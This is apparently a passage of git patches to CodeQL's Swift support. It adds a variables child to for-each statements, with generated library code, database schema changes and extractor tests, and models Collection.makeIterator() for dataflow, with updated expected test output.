100644 --- a/swift/ql/.gitattributes +++ b/swift/ql/.gitattributes @@ -1234,7 +1234,12 @@ /test/extractor-tests/generated/stmt/DoStmt/MISSING_SOURCE.txt linguist-generated /test/extractor-tests/generated/stmt/FailStmt/FailStmt.ql linguist-generated /test/extractor-tests/generated/stmt/FallthroughStmt/MISSING_SOURCE.txt linguist-generated -/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql linguist-generated +/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql linguist-generated /test/extractor-tests/generated/stmt/GuardStmt/MISSING_SOURCE.txt linguist-generated /test/extractor-tests/generated/stmt/IfStmt/MISSING_SOURCE.txt linguist-generated /test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.ql linguist-generated diff --git a/swift/ql/lib/codeql/swift/elements/stmt/ForEachStmt.qll b/swift/ql/lib/codeql/swift/elements/stmt/ForEachStmt.qll index 8777a189af1..84f08865dd0 100644 --- a/swift/ql/lib/codeql/swift/elements/stmt/ForEachStmt.qll +++ b/swift/ql/lib/codeql/swift/elements/stmt/ForEachStmt.qll @@ -9,5 +9,6 @@ import codeql.swift.elements.expr.Expr import codeql.swift.elements.stmt.LabeledStmt import codeql.swift.elements.pattern.Pattern import codeql.swift.elements.decl.PatternBindingDecl +import codeql.swift.elements.decl.VarDecl final class ForEachStmt = Impl::ForEachStmt; diff --git a/swift/ql/lib/codeql/swift/generated/ParentChild.qll b/swift/ql/lib/codeql/swift/generated/ParentChild.qll index 868d2d6b350..8f2d6fb5357 100644 --- a/swift/ql/lib/codeql/swift/generated/ParentChild.qll +++ b/swift/ql/lib/codeql/swift/generated/ParentChild.qll @@ -3873,14 +3873,15 @@ private module Impl { ForEachStmt e, int index, string partialPredicateCall ) { exists( - int b, int bLabeledStmt, int n, int nPattern, int nWhere, int nIteratorVar, int nNextCall, - int nBody + int b, int bLabeledStmt, int n, int nVariable, int nPattern, int nWhere, int nIteratorVar, + int nNextCall, int nBody | b = 0 and bLabeledStmt = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfLabeledStmt(e, i, _)) | i) and n = bLabeledStmt and - nPattern = n + 1 and + nVariable = n + 1 + max(int i | i = -1 or exists(e.getVariable(i)) | i) and + nPattern = nVariable + 1 and nWhere = nPattern + 1 and nIteratorVar = nWhere + 1 and nNextCall = nIteratorVar + 1 and @@ -3890,7 +3891,12 @@ private module Impl { or result = getImmediateChildOfLabeledStmt(e, index - b, partialPredicateCall) or - index = n and result = e.getImmediatePattern() and partialPredicateCall = "Pattern()" + result = e.getVariable(index - n) and + partialPredicateCall = "Variable(" + (index - n).toString() + ")" + or + index = nVariable and + result = e.getImmediatePattern() and + partialPredicateCall = "Pattern()" or index = nPattern and result = e.getImmediateWhere() and partialPredicateCall = "Where()" or diff --git a/swift/ql/lib/codeql/swift/generated/Raw.qll b/swift/ql/lib/codeql/swift/generated/Raw.qll index 69b72a2b06b..820dd7e3a88 100644 --- a/swift/ql/lib/codeql/swift/generated/Raw.qll +++ b/swift/ql/lib/codeql/swift/generated/Raw.qll @@ -3003,6 +3003,11 @@ module Raw { class ForEachStmt extends @for_each_stmt, LabeledStmt { override string toString() { result = "ForEachStmt" } + /** + * Gets the `index`th variable of this for each statement (0-based). + */ + VarDecl getVariable(int index) { for_each_stmt_variables(this, index, result) } + /** * Gets the pattern of this for each statement. */ diff --git a/swift/ql/lib/codeql/swift/generated/stmt/ForEachStmt.qll b/swift/ql/lib/codeql/swift/generated/stmt/ForEachStmt.qll index 9adc411cf6a..4b156f582f9 100644 --- a/swift/ql/lib/codeql/swift/generated/stmt/ForEachStmt.qll +++ b/swift/ql/lib/codeql/swift/generated/stmt/ForEachStmt.qll @@ -11,6 +11,7 @@ import codeql.swift.elements.expr.Expr import codeql.swift.elements.stmt.internal.LabeledStmtImpl::Impl as LabeledStmtImpl import codeql.swift.elements.pattern.Pattern import codeql.swift.elements.decl.PatternBindingDecl +import codeql.swift.elements.decl.VarDecl /** * INTERNAL: This module contains the fully generated definition of `ForEachStmt` and should not @@ -24,6 +25,26 @@ module Generated { class ForEachStmt extends Synth::TForEachStmt, LabeledStmtImpl::LabeledStmt { override string getAPrimaryQlClass() { result = "ForEachStmt" } + /** + * Gets the `index`th variable of this for each statement (0-based). + */ + VarDecl getVariable(int index) { + result = + Synth::convertVarDeclFromRaw(Synth::convertForEachStmtToRaw(this) + .(Raw::ForEachStmt) + .getVariable(index)) + } + + /** + * Gets any of the variables of this for each statement. + */ + final VarDecl getAVariable() { result = this.getVariable(_) } + + /** + * Gets the number of variables of this for each statement. + */ + final int getNumberOfVariables() { result = count(int i | exists(this.getVariable(i))) } + /** * Gets the pattern of this for each statement. * diff --git a/swift/ql/lib/swift.dbscheme b/swift/ql/lib/swift.dbscheme index 44c4818a898..33db81ad4b6 100644 --- a/swift/ql/lib/swift.dbscheme +++ b/swift/ql/lib/swift.dbscheme @@ -2019,6 +2019,13 @@ for_each_stmts( //dir=stmt int body: @brace_stmt_or_none ref ); +#keyset[id, index] +for_each_stmt_variables( //dir=stmt + int id: @for_each_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + #keyset[id] for_each_stmt_wheres( //dir=stmt int id: @for_each_stmt ref, diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.expected new file mode 100644 index 00000000000..2fd2e5d318e --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.expected @@ -0,0 +1,3 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | hasLabel: | no | getNumberOfVariables: | 2 | getPattern: | for.swift:4:9:4:9 | x | hasWhere: | yes | hasIteratorVar: | yes | hasNextCall: | yes | getBody: | for.swift:4:32:6:5 | { ... } | +| for.swift:7:5:9:5 | for ... in ... { ... } | hasLabel: | no | getNumberOfVariables: | 2 | getPattern: | for.swift:7:9:7:9 | s | hasWhere: | no | hasIteratorVar: | yes | hasNextCall: | yes | getBody: | for.swift:7:23:9:5 | { ... } | +| for.swift:13:5:17:5 | for ... in ... { ... } | hasLabel: | no | getNumberOfVariables: | 1 | getPattern: | for.swift:13:9:13:9 | x | hasWhere: | no | hasIteratorVar: | no | hasNextCall: | no | getBody: | for.swift:13:32:17:5 | { ... } | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql new file mode 100644 index 00000000000..bb659c7855a --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql @@ -0,0 +1,20 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from + ForEachStmt x, string hasLabel, int getNumberOfVariables, Pattern getPattern, string hasWhere, + string hasIteratorVar, string hasNextCall, BraceStmt getBody +where + toBeTested(x) and + not x.isUnknown() and + (if x.hasLabel() then hasLabel = "yes" else hasLabel = "no") and + getNumberOfVariables = x.getNumberOfVariables() and + getPattern = x.getPattern() and + (if x.hasWhere() then hasWhere = "yes" else hasWhere = "no") and + (if x.hasIteratorVar() then hasIteratorVar = "yes" else hasIteratorVar = "no") and + (if x.hasNextCall() then hasNextCall = "yes" else hasNextCall = "no") and + getBody = x.getBody() +select x, "hasLabel:", hasLabel, "getNumberOfVariables:", getNumberOfVariables, "getPattern:", + getPattern, "hasWhere:", hasWhere, "hasIteratorVar:", hasIteratorVar, "hasNextCall:", hasNextCall, + "getBody:", getBody diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.expected new file mode 100644 index 00000000000..72e969cbaa4 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.expected @@ -0,0 +1,2 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | file://:0:0:0:0 | var ... = ... | +| for.swift:7:5:9:5 | for ... in ... { ... } | file://:0:0:0:0 | var ... = ... | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql new file mode 100644 index 00000000000..76c004d4e56 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql @@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x +where toBeTested(x) and not x.isUnknown() +select x, x.getIteratorVar() diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql new file mode 100644 index 00000000000..218668c2e28 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql @@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x +where toBeTested(x) and not x.isUnknown() +select x, x.getLabel() diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.expected new file mode 100644 index 00000000000..191a8f2196b --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.expected @@ -0,0 +1,2 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | for.swift:4:5:4:5 | call to next() | +| for.swift:7:5:9:5 | for ... in ... { ... } | for.swift:7:5:7:5 | call to next() | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql new file mode 100644 index 00000000000..1b52342b92c --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql @@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x +where toBeTested(x) and not x.isUnknown() +select x, x.getNextCall() diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.expected new file mode 100644 index 00000000000..9762122d43d --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.expected @@ -0,0 +1,5 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | 0 | for.swift:4:9:4:9 | x | +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | 1 | for.swift:4:14:4:14 | $x$generator | +| for.swift:7:5:9:5 | for ... in ... { ... } | 0 | for.swift:7:9:7:9 | s | +| for.swift:7:5:9:5 | for ... in ... { ... } | 1 | for.swift:7:14:7:14 | $s$generator | +| for.swift:13:5:17:5 | for ... in ... { ... } | 0 | for.swift:13:9:13:9 | x | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql new file mode 100644 index 00000000000..9981a03570a --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql @@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x, int index +where toBeTested(x) and not x.isUnknown() +select x, index, x.getVariable(index) diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.expected new file mode 100644 index 00000000000..991ace80dd3 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.expected @@ -0,0 +1 @@ +| for.swift:4:5:6:5 | for ... in ... where ... { ... } | for.swift:4:25:4:30 | ... .!=(_:_:) ... | diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql new file mode 100644 index 00000000000..176846c278c --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql @@ -0,0 +1,7 @@ +// generated by codegen/codegen.py, do not edit +import codeql.swift.elements +import TestUtils + +from ForEachStmt x +where toBeTested(x) and not x.isUnknown() +select x, x.getWhere() diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt deleted file mode 100644 index bdba87873f2..00000000000 --- a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt +++ /dev/null @@ -1,4 +0,0 @@ -// generated by codegen/codegen.py, do not edit - -After a source file is added in this directory and codegen/codegen.py is run again, test queries -will appear and this file will be deleted diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/for.swift b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/for.swift new file mode 100644 index 00000000000..fbe80e3ae63 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/for.swift @@ -0,0 +1,19 @@ +struct S {} + +func test_sequence(_ ints: [Int], _ elements: [S]) { + for x in ints where x != 0 { + print(x) + } + for s in elements { + print(s) + } +} + +func test_variadic_pack(_ array: repeat [each T]) -> Bool { + for x in repeat each array { + if !x.isEmpty { + return false + } + } + return true +} diff --git a/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.expected b/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.expected index d511a390341..f0d85be52b6 100644 --- a/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.expected +++ b/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.expected @@ -187,6 +187,7 @@ methodlookup.swift: # 40| getBase(): [TypeExpr] Bar.Type # 40| getTypeRepr(): [TypeRepr] Bar # 40| getMethodRef(): [DeclRefExpr] staticMethod() +# 33| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 33| [NilLiteralExpr] nil # 38| [Comment] // Bar.instanceMethod(bar2)() // error: actor-isolated instance method 'instanceMethod()' can not be referenced from a non-isolated context # 38| @@ -262,6 +263,7 @@ methodlookup.swift: # 51| getMethodRef(): [DeclRefExpr] staticMethod() # 51| getMethodRef().getFullyConverted(): [FunctionConversionExpr] ((Baz.Type) -> @MainActor () -> ()) ... # 51| getElement(5).getFullyConverted(): [AwaitExpr] await ... +# 43| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 43| [NilLiteralExpr] nil # 47| [Comment] // DotSyntaxCallExpr # 47| diff --git a/swift/schema.py b/swift/schema.py index e1deb0a2778..7c2cebb594d 100644 --- a/swift/schema.py +++ b/swift/schema.py @@ -1016,6 +1016,7 @@ class DoStmt(LabeledStmt): body: BraceStmt | child class ForEachStmt(LabeledStmt): + variables: list[VarDecl] | child pattern: Pattern | child where: optional[Expr] | child iteratorVar: optional[PatternBindingDecl] | child From 1d43abfe4dcbae9bff7f575be777c872acb83146 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 28 Nov 2024 10:07:44 +0000 Subject: [PATCH 0755/1267] Swift: Model Collection.makeIterator(). --- .../frameworks/StandardLibrary/Collection.qll | 1 + .../dataflow/dataflow/DataFlow.expected | 39 +++++++++++++++++++ .../dataflow/dataflow/test.swift | 2 +- .../dataflow/dataflow/test2.swift | 4 +- .../CWE-020/MissingRegexAnchor.expected | 3 ++ .../Security/CWE-020/UnanchoredUrlRegex.swift | 6 +-- 6 files changed, 49 insertions(+), 6 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index 967eeec1432..5222b587d1e 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll @@ -44,6 +44,7 @@ private class CollectionSummaries extends SummaryModelCsv { ";Collection;true;trimmingPrefix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;trimmingPrefix(while:);;;Argument[-1];ReturnValue;taint", ";Collection;true;trimmingPrefix(while:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";Collection;true;makeIterator();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";RangeReplaceableCollection;true;init(_:);;;Argument[0];ReturnValue.CollectionElement;taint", ";RangeReplaceableCollection;true;init(_:);;;Argument[0].CollectionElement;ReturnValue.CollectionElement;value", ";RangeReplaceableCollection;true;init(repeating:count:);;;Argument[0];ReturnValue.CollectionElement;value", diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index 6214054c9fe..bf6376bb0a1 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -135,9 +135,15 @@ edges | test2.swift:69:10:69:10 | key | test2.swift:70:19:70:19 | key | provenance | | | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | test2.swift:69:5:69:5 | $generator [Collection element, Tuple element at index 0] | provenance | | | test2.swift:69:25:69:25 | d4 [Collection element, Tuple element at index 0] | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | provenance | | +| test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:78:14:78:14 | a1 [Collection element] | provenance | | | test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:82:19:82:19 | a1 [Collection element] | provenance | | | test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:84:20:84:20 | a1 [Collection element] | provenance | | | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:76:14:76:47 | [...] [Collection element] | provenance | | +| test2.swift:78:5:78:5 | $v$generator [Collection element] | test2.swift:78:5:78:5 | call to next() [some:0] | provenance | | +| test2.swift:78:5:78:5 | call to next() [some:0] | test2.swift:78:9:78:9 | v | provenance | | +| test2.swift:78:9:78:9 | v | test2.swift:79:19:79:19 | v | provenance | | +| test2.swift:78:14:78:14 | a1 [Collection element] | test2.swift:78:14:78:14 | call to makeIterator() [Collection element] | provenance | | +| test2.swift:78:14:78:14 | call to makeIterator() [Collection element] | test2.swift:78:5:78:5 | $v$generator [Collection element] | provenance | | | test2.swift:82:19:82:19 | a1 [Collection element] | test2.swift:82:19:82:24 | ...[...] | provenance | | | test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | provenance | | | test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | test2.swift:84:9:84:15 | (...) [Tuple element at index 1] | provenance | | @@ -146,9 +152,15 @@ edges | test2.swift:84:20:84:20 | a1 [Collection element] | test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | provenance | | | test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | provenance | | | test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:95:14:95:14 | a2 [Collection element] | provenance | | | test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:99:19:99:19 | a2 [Collection element] | provenance | | | test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:101:20:101:20 | a2 [Collection element] | provenance | | | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:93:5:93:5 | [post] a2 [Collection element] | provenance | | +| test2.swift:95:5:95:5 | $v$generator [Collection element] | test2.swift:95:5:95:5 | call to next() [some:0] | provenance | | +| test2.swift:95:5:95:5 | call to next() [some:0] | test2.swift:95:9:95:9 | v | provenance | | +| test2.swift:95:9:95:9 | v | test2.swift:96:19:96:19 | v | provenance | | +| test2.swift:95:14:95:14 | a2 [Collection element] | test2.swift:95:14:95:14 | call to makeIterator() [Collection element] | provenance | | +| test2.swift:95:14:95:14 | call to makeIterator() [Collection element] | test2.swift:95:5:95:5 | $v$generator [Collection element] | provenance | | | test2.swift:99:19:99:19 | a2 [Collection element] | test2.swift:99:19:99:24 | ...[...] | provenance | | | test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | provenance | | | test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | test2.swift:101:9:101:15 | (...) [Tuple element at index 1] | provenance | | @@ -712,9 +724,15 @@ edges | test.swift:849:19:849:24 | v | test.swift:850:15:850:15 | v | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:859:15:859:15 | args [Collection element] | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:860:15:860:15 | args [Collection element] | provenance | | +| test.swift:856:29:856:40 | args [Collection element] | test.swift:862:16:862:16 | args [Collection element] | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:867:15:867:15 | args [Collection element] | provenance | | | test.swift:859:15:859:15 | args [Collection element] | test.swift:859:15:859:21 | ...[...] | provenance | | | test.swift:860:15:860:15 | args [Collection element] | test.swift:860:15:860:21 | ...[...] | provenance | | +| test.swift:862:5:862:5 | $arg$generator [Collection element] | test.swift:862:5:862:5 | call to next() [some:0] | provenance | | +| test.swift:862:5:862:5 | call to next() [some:0] | test.swift:862:9:862:9 | arg | provenance | | +| test.swift:862:9:862:9 | arg | test.swift:863:19:863:19 | arg | provenance | | +| test.swift:862:16:862:16 | args [Collection element] | test.swift:862:16:862:16 | call to makeIterator() [Collection element] | provenance | | +| test.swift:862:16:862:16 | call to makeIterator() [Collection element] | test.swift:862:5:862:5 | $arg$generator [Collection element] | provenance | | | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | test.swift:866:27:866:29 | KeyPathComponent | provenance | | | test.swift:866:27:866:29 | KeyPathComponent | test.swift:866:21:866:29 | exit #keyPath(...) | provenance | | | test.swift:867:15:867:15 | args [Collection element] | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | provenance | | @@ -908,6 +926,12 @@ nodes | test2.swift:70:19:70:19 | key | semmle.label | key | | test2.swift:76:14:76:47 | [...] [Collection element] | semmle.label | [...] [Collection element] | | test2.swift:76:30:76:46 | call to source(_:) | semmle.label | call to source(_:) | +| test2.swift:78:5:78:5 | $v$generator [Collection element] | semmle.label | $v$generator [Collection element] | +| test2.swift:78:5:78:5 | call to next() [some:0] | semmle.label | call to next() [some:0] | +| test2.swift:78:9:78:9 | v | semmle.label | v | +| test2.swift:78:14:78:14 | a1 [Collection element] | semmle.label | a1 [Collection element] | +| test2.swift:78:14:78:14 | call to makeIterator() [Collection element] | semmle.label | call to makeIterator() [Collection element] | +| test2.swift:79:19:79:19 | v | semmle.label | v | | test2.swift:82:19:82:19 | a1 [Collection element] | semmle.label | a1 [Collection element] | | test2.swift:82:19:82:24 | ...[...] | semmle.label | ...[...] | | test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | semmle.label | $generator [Collection element, Tuple element at index 1] | @@ -920,6 +944,12 @@ nodes | test2.swift:86:19:86:19 | v | semmle.label | v | | test2.swift:93:5:93:5 | [post] a2 [Collection element] | semmle.label | [post] a2 [Collection element] | | test2.swift:93:13:93:29 | call to source(_:) | semmle.label | call to source(_:) | +| test2.swift:95:5:95:5 | $v$generator [Collection element] | semmle.label | $v$generator [Collection element] | +| test2.swift:95:5:95:5 | call to next() [some:0] | semmle.label | call to next() [some:0] | +| test2.swift:95:9:95:9 | v | semmle.label | v | +| test2.swift:95:14:95:14 | a2 [Collection element] | semmle.label | a2 [Collection element] | +| test2.swift:95:14:95:14 | call to makeIterator() [Collection element] | semmle.label | call to makeIterator() [Collection element] | +| test2.swift:96:19:96:19 | v | semmle.label | v | | test2.swift:99:19:99:19 | a2 [Collection element] | semmle.label | a2 [Collection element] | | test2.swift:99:19:99:24 | ...[...] | semmle.label | ...[...] | | test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | semmle.label | $generator [Collection element, Tuple element at index 1] | @@ -1518,6 +1548,12 @@ nodes | test.swift:859:15:859:21 | ...[...] | semmle.label | ...[...] | | test.swift:860:15:860:15 | args [Collection element] | semmle.label | args [Collection element] | | test.swift:860:15:860:21 | ...[...] | semmle.label | ...[...] | +| test.swift:862:5:862:5 | $arg$generator [Collection element] | semmle.label | $arg$generator [Collection element] | +| test.swift:862:5:862:5 | call to next() [some:0] | semmle.label | call to next() [some:0] | +| test.swift:862:9:862:9 | arg | semmle.label | arg | +| test.swift:862:16:862:16 | args [Collection element] | semmle.label | args [Collection element] | +| test.swift:862:16:862:16 | call to makeIterator() [Collection element] | semmle.label | call to makeIterator() [Collection element] | +| test.swift:863:19:863:19 | arg | semmle.label | arg | | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | semmle.label | enter #keyPath(...) [Collection element] | | test.swift:866:21:866:29 | exit #keyPath(...) | semmle.label | exit #keyPath(...) | | test.swift:866:27:866:29 | KeyPathComponent | semmle.label | KeyPathComponent | @@ -1661,8 +1697,10 @@ subpaths | test2.swift:53:15:53:28 | ... ??(_:_:) ... | test2.swift:46:17:46:33 | call to source(_:) | test2.swift:53:15:53:28 | ... ??(_:_:) ... | result | | test2.swift:54:15:54:24 | ...! | test2.swift:46:17:46:33 | call to source(_:) | test2.swift:54:15:54:24 | ...! | result | | test2.swift:70:19:70:19 | key | test2.swift:60:8:60:24 | call to source(_:) | test2.swift:70:19:70:19 | key | result | +| test2.swift:79:19:79:19 | v | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:79:19:79:19 | v | result | | test2.swift:82:19:82:24 | ...[...] | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:82:19:82:24 | ...[...] | result | | test2.swift:86:19:86:19 | v | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:86:19:86:19 | v | result | +| test2.swift:96:19:96:19 | v | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:96:19:96:19 | v | result | | test2.swift:99:19:99:24 | ...[...] | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:99:19:99:24 | ...[...] | result | | test2.swift:103:19:103:19 | v | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:103:19:103:19 | v | result | | test.swift:7:15:7:15 | t1 | test.swift:6:19:6:26 | call to source() | test.swift:7:15:7:15 | t1 | result | @@ -1789,6 +1827,7 @@ subpaths | test.swift:850:15:850:15 | v | test.swift:872:18:872:25 | call to source() | test.swift:850:15:850:15 | v | result | | test.swift:859:15:859:21 | ...[...] | test.swift:873:24:873:31 | call to source() | test.swift:859:15:859:21 | ...[...] | result | | test.swift:860:15:860:21 | ...[...] | test.swift:873:24:873:31 | call to source() | test.swift:860:15:860:21 | ...[...] | result | +| test.swift:863:19:863:19 | arg | test.swift:873:24:873:31 | call to source() | test.swift:863:19:863:19 | arg | result | | test.swift:867:15:867:38 | \\...[...] | test.swift:873:24:873:31 | call to source() | test.swift:867:15:867:38 | \\...[...] | result | | test.swift:880:19:880:19 | elem | test.swift:877:21:877:28 | call to source() | test.swift:880:19:880:19 | elem | result | | test.swift:884:15:884:31 | ...! | test.swift:877:21:877:28 | call to source() | test.swift:884:15:884:31 | ...! | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index a0c6c6aee88..515aa666201 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -860,7 +860,7 @@ func testVarargs3(_ v: Int, _ args: Int...) { sink(arg: args[1]) // $ flow=873 for arg in args { - sink(arg: arg) // $ MISSING: flow=873 + sink(arg: arg) // $ flow=873 } let myKeyPath = \[Int][1] diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test2.swift b/swift/ql/test/library-tests/dataflow/dataflow/test2.swift index a1d9524a604..f0356f4dd22 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test2.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test2.swift @@ -76,7 +76,7 @@ func testArrays1() { var a1 = ["a", "b", 